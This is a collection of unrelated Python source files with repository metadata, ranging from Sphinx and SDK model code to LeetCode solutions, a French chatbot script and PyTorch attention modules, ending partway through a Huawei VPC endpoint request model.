xrotwang@googlemail.com
|
e5a27eaa219e0fde7041e68c4eb80d954a19f87a
|
66c6f9a24c9a1f912e93f96b439b81a10cffac77
|
/test/vanilla/Expected/AcceptanceTests/BodyBoolean/bodyboolean/__init__.py
|
9582ec858066aa9339d3ef1d5f01d189ad7214ef
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
kairu-ms/autorest.python
|
5dd0e8bf2ebf0c0dc148342003899fabd269f946
|
20870e3870fcfeae9567b63343d2320bf388f3c6
|
refs/heads/master
| 2023-04-29T23:00:50.568945
| 2020-01-17T18:03:00
| 2020-01-17T18:03:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from ._configuration import AutoRestBoolTestServiceConfiguration
from ._auto_rest_bool_test_service import AutoRestBoolTestService
# Public package surface: the generated client and its configuration.
__all__ = ['AutoRestBoolTestService', 'AutoRestBoolTestServiceConfiguration']
from .version import VERSION
__version__ = VERSION
|
[
"noreply@github.com"
] |
kairu-ms.noreply@github.com
|
2435d771630538e9959dd54e81aaf11fc02774d0
|
87b7ec1af5bde5aa46f1982008aecec00ca00c1d
|
/conf.py
|
027ac88796a93502408f1ac60968deead521e278
|
[
"MIT"
] |
permissive
|
kattni/Adafruit_CircuitPython_VS1053
|
ca656e64a83f74e398bbc0ad21d8c9fd27614270
|
20d5ac7f71117b8bdd4db75678ce98e3a6b19e49
|
refs/heads/master
| 2020-03-31T09:50:02.930951
| 2018-10-09T01:39:32
| 2018-10-09T01:39:32
| 152,112,523
| 0
| 0
| null | 2018-10-08T16:34:31
| 2018-10-08T16:34:31
| null |
UTF-8
|
Python
| false
| false
| 4,600
|
py
|
# -*- coding: utf-8 -*-
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
]
intersphinx_mapping = {'python': ('https://docs.python.org/3.4', None),'BusDevice': ('https://circuitpython.readthedocs.io/projects/bus_device/en/latest/', None),'CircuitPython': ('https://circuitpython.readthedocs.io/en/latest/', None)}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'README'
# General information about the project.
project = u'Adafruit VS1053 Library'
copyright = u'2017 Tony DiCola'
author = u'Tony DiCola'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
default_role = "any"
# If true, '()' will be appended to :func: etc. cross-reference text.
#
add_function_parentheses = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# Select the HTML theme. On Read the Docs the platform injects its own
# theme; locally we try sphinx_rtd_theme and fall back to the builtin one.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'

if not on_rtd:  # only import and set the theme if we're building docs locally
    try:
        import sphinx_rtd_theme
        html_theme = 'sphinx_rtd_theme'
        html_theme_path = [sphinx_rtd_theme.get_html_theme_path(), '.']
    except ImportError:
        # Narrowed from a bare `except:`: only a missing package should
        # trigger the fallback, not e.g. KeyboardInterrupt or typos.
        html_theme = 'default'
        html_theme_path = ['.']
else:
    html_theme_path = ['.']
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Output file base name for HTML help builder.
htmlhelp_basename = 'AdafruitVS1053Librarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'AdafruitVS1053Library.tex', u'Adafruit VS1053 Library Documentation',
author, 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'adafruitVS1053library', u'Adafruit VS1053 Library Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'AdafruitVS1053Library', u'Adafruit VS1053 Library Documentation',
author, 'AdafruitVS1053Library', 'One line description of project.',
'Miscellaneous'),
]
|
[
"tony@tonydicola.com"
] |
tony@tonydicola.com
|
529a5ab95bf0f23e3253b65c5eec0ee18fc952aa
|
0455b5da2b6bc9fad7b92f6b99005a8c81cdda97
|
/emiratesnbd/items.py
|
9d273557032c6fd1404c5a4aab8e83a35ed96782
|
[] |
no_license
|
hristo-grudev/emiratesnbd
|
da22bf3f3023f5bd6b9e230a4df3da5ab61d509c
|
48494986f0ed44b15cc1b7b1a425a4d65582cf1f
|
refs/heads/main
| 2023-04-15T00:59:31.067111
| 2021-04-22T06:28:13
| 2021-04-22T06:28:13
| 360,414,897
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
import scrapy
class EmiratesnbdItem(scrapy.Item):
    """Container for one scraped article: title, description, date."""
    title = scrapy.Field()
    description = scrapy.Field()
    date = scrapy.Field()
|
[
"hr.grudev@gmail.com"
] |
hr.grudev@gmail.com
|
4be32626ca67e776aca8f11478838d70d8e803bb
|
5afd733a5c1f753601c69b8b4eae1b49edfbae7c
|
/201-300/282.py
|
f1575add29bfe60cd0d5c53e27f8449440e6ebb0
|
[] |
no_license
|
yanbinbi/leetcode
|
9dcd4a0160be915006455b83d6b7cd39e9819811
|
616a868bfa7bdd00195067b0477b0236a72d23e0
|
refs/heads/master
| 2021-05-13T19:34:17.222576
| 2017-11-12T02:04:31
| 2017-11-12T02:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
class Solution(object):
    def addOperators(self, num, target):
        """
        :type num: str
        :type target: int
        :rtype: List[str]

        LeetCode 282 "Expression Add Operators": split the digit string
        `num` into operands (dfs), then insert '+'/'-'/'*' between them
        (cal) and collect every expression that evaluates to `target`.
        """
        self.ret =set()
        self.dfs(num, [], target)
        return list(self.ret)

    def dfs(self, num, arr, target):
        # Enumerate every split of `num` into integer operands.
        # Leading zeros are only allowed for the single digit '0'.
        size = len(num)
        if size == 0:
            if len(arr) > 0:
                self.cal(arr, target, '', False)
        else:
            for i in range(1, size+1):
                if num[0] != '0' or i == 1:
                    arr.append(int(num[:i]))
                    self.dfs(num[i:], arr, target)
                    arr.pop()

    def cal(self, arr, target, exp, reverse):
        # Recursively place an operator after arr[0].
        # `reverse` flips the meaning of '+'/'-' so that subtraction can
        # be expressed as "remaining suffix must equal val - target".
        size = len(arr)
        if size == 0 and target == 0:
            self.ret.add(exp)
        else:
            val = arr[0]
            exp += str(val)
            plus, minus = ('+','-') if not reverse else ('-','+')
            for i in range(1,size):
                a, b = arr[i], arr[i:]
                # '+': suffix must contribute target - val;
                # '-': suffix must contribute val - target (sign flipped).
                self.cal(b, target-val, exp+plus, reverse)
                self.cal(b, -target+val, exp+minus, not reverse)
                # '*': fold arr[i] into the running product and continue.
                val *= a
                exp += ('*'+str(a))
            if val == target:
                self.ret.add(exp)
|
[
"xukaifeng1986@gmail.com"
] |
xukaifeng1986@gmail.com
|
9d13794ae4997422a14e76c2f9e828ff273b8e4e
|
5537eec7f43098d216d2b550678c8d10b2a26f09
|
/venv/ansible/lib/python2.7/site-packages/azure/batch/models/task_scheduling_policy.py
|
220faadb2936c714ded099065c8ed5afe1731434
|
[] |
no_license
|
wipro-sdx/Automation
|
f0ae1512b8d9d491d7bacec94c8906d06d696407
|
a8c46217d0fbe51a71597b5db87cbe98ed19297a
|
refs/heads/master
| 2021-07-08T11:09:05.314435
| 2018-05-02T07:18:54
| 2018-05-02T07:18:54
| 131,812,982
| 0
| 1
| null | 2020-07-23T23:22:33
| 2018-05-02T07:15:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskSchedulingPolicy(Model):
    """Specifies how tasks should be distributed across compute nodes.

    :param node_fill_type: How tasks should be distributed across compute
     nodes. Possible values include: 'spread', 'pack', 'unmapped'
    :type node_fill_type: str or :class:`ComputeNodeFillType
     <azure.batch.models.ComputeNodeFillType>`
    """

    # msrest validation map: node_fill_type is mandatory.
    _validation = {
        'node_fill_type': {'required': True},
    }

    # Maps the Python attribute to its wire (JSON) key and serialized type.
    _attribute_map = {
        'node_fill_type': {'key': 'nodeFillType', 'type': 'ComputeNodeFillType'},
    }

    def __init__(self, node_fill_type):
        # NOTE(review): does not call super().__init__(); this matches the
        # other generated models of this SDK vintage -- confirm before changing.
        self.node_fill_type = node_fill_type
|
[
"admin@example.com"
] |
admin@example.com
|
e00c4b648f1a238bca577a041f426ddc93bae731
|
b01429f27f8d7f4db7e3eba0abbb6be1ea67e2fa
|
/imageimage1.2/langage.py
|
dc64ee7d7051ab678f89b67c5e801ac667c1855a
|
[] |
no_license
|
pastrouveedespeudo/ste-fois-c-la-bonne
|
3dce8cdfc6b5523d9651e8ec9a143b7ab7789d21
|
9872c35423870c9854ee0bda120cca0c832c1fc9
|
refs/heads/master
| 2020-04-20T22:08:34.295196
| 2019-02-17T17:18:36
| 2019-02-17T17:18:36
| 169,129,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,165
|
py
|
from mémoire import *
from outils_fichier import *
from politesse import *
from outils_internet import *
#Regle
#ne seront maqué que les truk importants
#dans mémoire str.find la liste, si ya pas on ajoute fais le
#ca fait ia
class langage:
    """Interactive chatbot front-end: reads one sentence from stdin,
    normalises it, classifies its punctuation and decides whether it is a
    politeness formula (greeting).

    NOTE(review): at module level the name `langage` is rebound from this
    class to a singleton instance; the `langage.<method>()` calls inside
    the methods below resolve through that global instance at call time,
    so they only work after the rebinding at the bottom of the file.
    """
    def début1(self):
        #début1(self, oInput)
        #self.oInput = oInput
        # Load the known politeness formulas, read user input, lower-case
        # it, and record it as a new formula if it is not already known.
        politesse.politesse(self)
        self.oInput = input("salut")
        self.oInput = self.oInput.lower()
        langage.exception()
        print(self.oInput)
        c = 0
        # Count how many known formulas match the input exactly.
        for i in self.politesse:
            if self.oInput != i:
                pass
            elif self.oInput == i:
                c+=1
        if c <= 0:
            # Unknown phrase: persist it into the politesse module.
            outils_fichier.ecris_propri(self, self.oInput, "politesse.py")
    def exception(self):
        # Spelling special cases: restore the cedilla of "ça va";
        # greetings like "hey" pass through unchanged.
        exception1 = "ça va"
        if self.oInput == "ca va" or self.oInput == "ca va ?" :
            self.oInput = self.oInput.replace("c","ç")
        elif self.oInput == "hey" or self.oInput == "Hey":
            pass
    def début1_1(self):
        # Split the input into words (one liste1 slot per word, at most 13
        # words) and tag every word that is a known punctuation mark.
        mémoire.liste(self)
        liste = []
        liste1 = [[],[],[],[],[],[],[],[],[],[],[],[],[]]
        self.liste_langage = [] # important list: accumulated punctuation tags
        self.ponctu = [] # second important list: trailing punctuation mark
        liste.append(self.oInput)
        c = 0
        # Bucket the characters of the sentence word by word.
        for i in liste:
            for j in i:
                if j == " ":
                    c+=1
                else:
                    liste1[c].append(j)
        # Compare each reassembled word against every known mark.
        for i in self.liste_ponctuation:
            for j in liste1:
                if j == [] or j == [""] or j == [" "] or j == [ ]:
                    pass
                else:
                    j = "".join(j)
                    if i == j :
                        langage.début1_1_outils( "?", self.liste_langage, self.intero, i)
                        langage.début1_1_outils( "!", self.liste_langage, self.excla, i)
                        langage.début1_1_outils( ".", self.liste_langage, self.point, i)
                        langage.début1_1_outils( ",", self.liste_langage, self.virgule, i)
                        langage.début1_1_outils( "'", self.liste_langage, self.guillemet, i)
                        langage.début1_1_outils( ":", self.liste_langage, self.deuxpoints, i)
                        langage.début1_1_outils( "?!", self.liste_langage, self.interoexcla, i)
        # Strip the final character, assumed to be the sentence's mark.
        self.ponctu = self.oInput[-1]
        self.oInput = self.oInput[:-1]
        if self.liste_langage == []:
            self.liste_langage.append("aucune ponctuation")
        print(self.liste_langage)
    def début1_1_outils(self, ponctuation, liste, késako, i):
        # If the detected mark `i` equals `ponctuation`, extend `liste`
        # with the matching tag words `késako`.
        mémoire.liste(self)
        self.i = i
        self.liste = liste
        self.késako = késako
        self.ponctuation = ponctuation
        if self.i == self.ponctuation:
            self.liste.extend(self.késako)
    def début1_reponse(self):
        # Placeholder: reply generation not implemented yet.
        pass
    def définition_context_phrase(self):
        # Look the sentence up online and decide whether it is a greeting.
        liste = []
        outils_internet.recherche_langage(self, self.oInput, liste)
        self.politesse = ""
        a = ["forme de politesse", "Forme de politesse", "Marque de politesse",
        "Formule de salutation", "salutation", "Salutation", "Formule de politesse"]
        for i in a:
            formule_politesse = str(liste).find(str(i))
            if formule_politesse > 0:
                print(self.oInput + " beauté, c deja un bon debut !")
                # politeness formula detected
                self.politesse = True
                break
        if self.politesse == True:
            pass
            # otherwise: still need to work out what the speaker is
            # actually talking about (not implemented)
# Rebind the module-level name `langage` from the class to a singleton
# instance -- the methods above rely on this rebinding when they call
# `langage.<method>()` -- then run the pipeline.
langage = langage()
langage.début1()
langage.début1_1()
langage.définition_context_phrase()
|
[
"noreply@github.com"
] |
pastrouveedespeudo.noreply@github.com
|
b04ed6d55babef029018dcc05dcb6afed7e6ad71
|
0dc27aeb342b9b898256adf256c5b77a666e68fb
|
/lm386/codes/coeffs.py
|
f505630bc52bdbb325464e11d00650e33c721eb4
|
[] |
no_license
|
gadepall/EE2230
|
7861b898d90abf04b935cb77b31f2c70e290b096
|
739b01d8f5da93cc5c38121e62ea6d9e87851146
|
refs/heads/master
| 2020-03-25T20:25:57.885565
| 2019-10-06T01:57:13
| 2019-10-06T01:57:13
| 144,130,660
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,010
|
py
|
import numpy as np
def dir_vec(A, B):
    """Displacement vector pointing from point A towards point B."""
    return np.subtract(B, A)
def norm_vec(A,B):
    # Normal to segment AB: rotate its direction vector by 90 degrees
    # using the module-level rotation matrix `omat` (defined below).
    return omat@dir_vec(A,B)
#Generate line points
def line_gen(A, B, n=10):
    """Return `n` evenly spaced points on segment AB as a (2, n) array.

    The sample count used to be a local named `len` (shadowing the
    builtin); it is now the parameter `n` with the same default of 10,
    so existing two-argument callers behave identically.
    """
    x_AB = np.zeros((2, n))
    lam_1 = np.linspace(0, 1, n)
    for i in range(n):
        temp1 = A + lam_1[i] * (B - A)
        x_AB[:, i] = temp1.T
    return x_AB
#Centre and Radius of the circumcircle
def ccircle(A,B,C):
    """Circumcentre O and circumradius r of triangle ABC (2-D points).

    O is the intersection of the perpendicular bisectors of AB and BC,
    solved as a 2x2 linear system N @ O = p.
    """
    p = np.zeros(2)
    n1 = dir_vec(B,A)  # normal of AB's bisector is the chord direction
    p[0] = 0.5*(np.linalg.norm(A)**2-np.linalg.norm(B)**2)
    n2 = dir_vec(C,B)
    p[1] = 0.5*(np.linalg.norm(B)**2-np.linalg.norm(C)**2)
    #Intersection
    N=np.vstack((n1,n2))
    O=np.linalg.inv(N)@p
    r = np.linalg.norm(A -O)
    return O,r
def line_intersect(n1, c1, n2, c2):
    """Intersection point of the lines n1.x = c1 and n2.x = c2."""
    coeff = np.vstack((n1, n2))
    rhs = np.array([c1, c2], dtype=float)
    return np.linalg.inv(coeff) @ rhs
#Intersection
# Demo inputs and the 90-degree rotation matrix used by norm_vec above.
A = np.array([-2,-2])
B = np.array([1,3])
dvec = np.array([-1,1])
omat = np.array([[0,1],[-1,0]])  # rotates a 2-D vector by -90 degrees
#AB =np.vstack((A,B)).T
#print (dir_vec(A,B))
#print (norm_vec(A,B))
|
[
"gadepall@gmail.com"
] |
gadepall@gmail.com
|
6f9f7154c397d558289889cac3d1ff8b7cb8991b
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_upstarts.py
|
a99715c49d6b20f79507a7ced2a14b39179cb8bc
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
#calss header
class _UPSTARTS():
def __init__(self,):
self.name = "UPSTARTS"
self.definitions = upstart
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['upstart']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
0cb85670c7ca2f434db6351d257e24ca060fa7f1
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/380/usersdata/341/93264/submittedfiles/principal.py
|
6cda24a7d78aabf878f6abdc614407b80d6ddb97
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 276
|
py
|
# -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO ("start here below" -- assignment template marker)
# Reads n grades from stdin, echoes each grade, then prints their mean.
n=int(input('Digite a quantidade de notas: '))
notas = []
for i in range (0,n,1):
    notas.append(float(input('Digite a nota%d: ' % (i+1))))
media=0
# The mean is accumulated incrementally as sum(notas[i] / n).
for i in range (0,n,1):
    media += notas[i]/n
    print(notas[i])
print(media)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
279efe43b1dbd7cc075bd5b7c93df9bcdff1d52d
|
b5e93a09ee136b2b035c9958557e3e4091d8d9fd
|
/horch/models/attention.py
|
d13ba6fb39ab10e20773465ea90474516517c923
|
[
"MIT"
] |
permissive
|
ccglyyn/pytorch-hrvvi-ext
|
2ee0cd27461c344783150535fbadea5fbe29f25b
|
a020da3543982464ff3888ff84b311e98a130d6d
|
refs/heads/master
| 2022-04-20T13:35:07.561985
| 2020-04-21T10:36:36
| 2020-04-21T10:36:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import torch
from horch.models.modules import Conv2d, HardSigmoid, Identity
from torch import nn as nn
from torch.nn import functional as F
class SEModule(nn.Module):
    """Squeeze-and-Excitation channel attention gate.

    Globally average-pools the feature map, passes the channel vector
    through a bottleneck MLP with a sigmoid, and rescales each channel.
    """

    def __init__(self, in_channels, reduction=8):
        super().__init__()
        hidden = in_channels // reduction
        self.pool = nn.AdaptiveAvgPool2d(1)
        self.layers = nn.Sequential(
            nn.Linear(in_channels, hidden),
            nn.ReLU(True),
            nn.Linear(hidden, in_channels),
            nn.Sigmoid(),
        )

    def forward(self, x):
        batch, channels = x.shape[:2]
        gate = self.pool(x).reshape(batch, channels)
        gate = self.layers(gate).reshape(batch, channels, 1, 1)
        return x * gate
class CBAMChannelAttention(nn.Module):
    """CBAM channel gate: sigmoid(MLP(avgpool(x)) + MLP(maxpool(x)))."""

    def __init__(self, in_channels, reduction=8):
        super().__init__()
        hidden = in_channels // reduction
        self.mlp = nn.Sequential(
            nn.Linear(in_channels, hidden),
            nn.ReLU(True),
            nn.Linear(hidden, in_channels),
        )

    def forward(self, x):
        batch, channels = x.shape[:2]
        # Average- and max-pooled descriptors share the same MLP.
        avg_att = self.mlp(F.adaptive_avg_pool2d(x, 1).view(batch, channels))
        max_att = self.mlp(F.adaptive_max_pool2d(x, 1).view(batch, channels))
        gate = torch.sigmoid(avg_att + max_att).view(batch, channels, 1, 1)
        return x * gate
class CBAMSpatialAttention(nn.Module):
    """CBAM spatial gate: 7x7 conv over channel-wise mean and max maps."""

    def __init__(self):
        super().__init__()
        # Conv2d is the project's wrapper (horch.models.modules).
        self.conv = Conv2d(2, 1, kernel_size=7, norm_layer='bn')

    def forward(self, x):
        mean_map = x.mean(dim=1, keepdim=True)
        max_map = x.max(dim=1, keepdim=True)[0]
        stacked = torch.cat([mean_map, max_map], dim=1)
        gate = torch.sigmoid(self.conv(stacked))
        return x * gate
class CBAM(nn.Module):
    """Convolutional Block Attention Module: channel gate, then spatial gate."""

    def __init__(self, in_channels, reduction=4):
        super().__init__()
        self.channel = CBAMChannelAttention(in_channels, reduction)
        self.spatial = CBAMSpatialAttention()

    def forward(self, x):
        return self.spatial(self.channel(x))
class SELayerM(nn.Module):
    """SE gate variant using ReLU6 and a hard sigmoid (MobileNetV3 style)."""

    def __init__(self, in_channels, reduction=4):
        super().__init__()
        hidden = in_channels // reduction
        self.avgpool = nn.AdaptiveAvgPool2d(1)
        self.layers = nn.Sequential(
            nn.Linear(in_channels, hidden),
            nn.ReLU6(True),
            nn.Linear(hidden, in_channels),
            HardSigmoid(True),  # project op (horch.models.modules)
        )

    def forward(self, x):
        batch, channels = x.shape[:2]
        gate = self.avgpool(x).reshape(batch, channels)
        gate = self.layers(gate).reshape(batch, channels, 1, 1)
        return x * gate
def get_attention(name, **kwargs):
    """Factory for attention modules.

    A falsy *name* yields a pass-through Identity; otherwise *name* is
    matched case-insensitively against 'se', 'sem' and 'cbam'.

    Raises NotImplementedError for any other name.
    """
    if not name:
        return Identity()
    key = name.lower()
    factories = {'se': SEModule, 'sem': SELayerM, 'cbam': CBAM}
    if key not in factories:
        raise NotImplementedError("No attention module named %s" % key)
    return factories[key](**kwargs)
|
[
"sbl1996@126.com"
] |
sbl1996@126.com
|
f9939dba69a49fcceaa92a28b7e0708a772e5a5d
|
51891febfc6247af3fe5c39b3063d1f1995a0173
|
/src/scatter3d_demo.py
|
50e8fbaac07658778552197aa7e1ff424f28fe21
|
[] |
no_license
|
jim1949/car_controller
|
4ab391eef29e46563853bc3d54a06a6c4a0714c4
|
f2053ddde429dbdef39261d24197f3bc7936166f
|
refs/heads/master
| 2020-12-25T14:23:37.339889
| 2016-09-13T09:55:07
| 2016-09-13T09:55:07
| 67,448,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,068
|
py
|
# import numpy as np
# from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.pyplot as plt
# # def randrange(n, vmin, vmax):
# # return (vmax - vmin)*np.random.rand(n) + vmin
# # fig = plt.figure()
# # ax = fig.add_subplot(111, projection='3d')
# # n = 100
# # for c, m, zl, zh in [('r', 'o', -50, -25), ('b', '^', -30, -5)]:
# # xs = randrange(n, 23, 32)
# # ys = randrange(n, 0, 100)
# # zs = randrange(n, zl, zh)
# # ax.scatter(xs, ys, zs, c=c, marker=m)
# xs=np.array((range(1,100)))
# ys=np.array((range(1,100)))
# zs=np.array((range(1,100)))
# Axes3D.scatter(xs, ys, zs, zdir='z', c='b')
# ax.set_xlabel('X Label')
# ax.set_ylabel('Y Label')
# ax.set_zlabel('Z Label')
# plt.show()
from mpl_toolkits.mplot3d import Axes3D  # noqa: F401 -- registers the '3d' projection
import matplotlib.pyplot as plt

# Minimal 3-D scatter demo: ten hard-coded (x, y, z) points.
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x =[1,2,3,4,5,6,7,8,9,10]
y =[5,6,2,3,13,4,1,2,4,8]
z =[2,3,3,3,5,7,9,11,9,10]
ax.scatter(x, y, z, c='r', marker='o')
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()  # blocks until the window is closed
|
[
"jim1949@163.com"
] |
jim1949@163.com
|
1891a0d48660d0b40e0a7143031cddabaaaca6d6
|
c1267fbec95318184e7388cddf9b7085f797d514
|
/2023/03 March/db03242023.py
|
c6859abc43ce48d34df3d2d5d2e620c5251009bd
|
[
"MIT"
] |
permissive
|
vishrutkmr7/DailyPracticeProblemsDIP
|
1aedfd2e173847bf22989a6b0ec550acebb2bd86
|
2c365f633a1e1bee281fbdc314969f03b17ac9ec
|
refs/heads/master
| 2023-05-31T23:49:52.135349
| 2023-05-28T09:32:12
| 2023-05-28T09:32:12
| 199,596,248
| 10
| 4
|
MIT
| 2022-11-02T21:31:59
| 2019-07-30T07:12:46
|
Python
|
UTF-8
|
Python
| false
| false
| 563
|
py
|
"""
Given positive an integer num, return whether or not it is a perfect square.
Ex: Given the following num...
num = 9, return true.
Ex: Given the following num...
num = 18, return false.
"""
class Solution:
    def isPerfectSquare(self, num: int) -> bool:
        """Return True iff *num* is a perfect square.

        Uses integer-only Newton iteration, which is exact for
        arbitrarily large ints. The previous version used float division
        (`num / r`), which loses precision for num > 2**52 and could
        misclassify large inputs. Negative numbers return False; 0 and 1
        are perfect squares.
        """
        if num < 0:
            return False
        r = num
        while r * r > num:
            r = (r + num // r) // 2  # Newton step, floor arithmetic only
        return r * r == num
# Test Cases
if __name__ == "__main__":
    # Smoke tests; `is True/False` also pins the exact bool return type.
    solution = Solution()
    assert solution.isPerfectSquare(9) is True
    assert solution.isPerfectSquare(18) is False
    print("All tests passed.")
|
[
"vishrutkmr7@gmail.com"
] |
vishrutkmr7@gmail.com
|
8295157610a4f2105ed98d1ae6239095adf384e2
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-vpcep/huaweicloudsdkvpcep/v1/model/update_endpoint_service_request_body.py
|
3bc8d522210d8b68191c685c6dd1771204d35e22
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,291
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UpdateEndpointServiceRequestBody:
    """Request body for updating a VPC endpoint service (generated model).

    Attributes:
        openapi_types (dict): The key is attribute name
                              and the value is attribute type.
        attribute_map (dict): The key is attribute name
                              and the value is json key in definition.
    """

    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'approval_enabled': 'bool',
        'service_name': 'str',
        'ports': 'list[PortList]',
        'port_id': 'str',
        'vip_port_id': 'str'
    }

    attribute_map = {
        'approval_enabled': 'approval_enabled',
        'service_name': 'service_name',
        'ports': 'ports',
        'port_id': 'port_id',
        'vip_port_id': 'vip_port_id'
    }

    def __init__(self, approval_enabled=None, service_name=None, ports=None, port_id=None, vip_port_id=None):
        """UpdateEndpointServiceRequestBody - a model defined in huaweicloud sdk"""

        self._approval_enabled = None
        self._service_name = None
        self._ports = None
        self._port_id = None
        self._vip_port_id = None
        self.discriminator = None

        # Only explicitly supplied fields are set, so an update request
        # serialises just the attributes the caller wants to change.
        if approval_enabled is not None:
            self.approval_enabled = approval_enabled
        if service_name is not None:
            self.service_name = service_name
        if ports is not None:
            self.ports = ports
        if port_id is not None:
            self.port_id = port_id
        if vip_port_id is not None:
            self.vip_port_id = vip_port_id

    @property
    def approval_enabled(self):
        """Gets the approval_enabled of this UpdateEndpointServiceRequestBody.

        Whether connections require approval. false: no approval needed;
        endpoint connections are created directly in the 'accepted' state.
        true: connections must be approved by the owner of the endpoint
        service before use. Defaults to true (approval required).

        :return: The approval_enabled of this UpdateEndpointServiceRequestBody.
        :rtype: bool
        """
        return self._approval_enabled

    @approval_enabled.setter
    def approval_enabled(self, approval_enabled):
        """Sets the approval_enabled of this UpdateEndpointServiceRequestBody.

        Whether connections require approval; see the getter for details.

        :param approval_enabled: The approval_enabled of this UpdateEndpointServiceRequestBody.
        :type: bool
        """
        self._approval_enabled = approval_enabled

    @property
    def service_name(self):
        """Gets the service_name of this UpdateEndpointServiceRequestBody.

        Name of the endpoint service: at most 16 characters drawn from
        letters, digits, underscores and hyphens.

        :return: The service_name of this UpdateEndpointServiceRequestBody.
        :rtype: str
        """
        return self._service_name

    @service_name.setter
    def service_name(self, service_name):
        """Sets the service_name of this UpdateEndpointServiceRequestBody.

        Name of the endpoint service; see the getter for constraints.

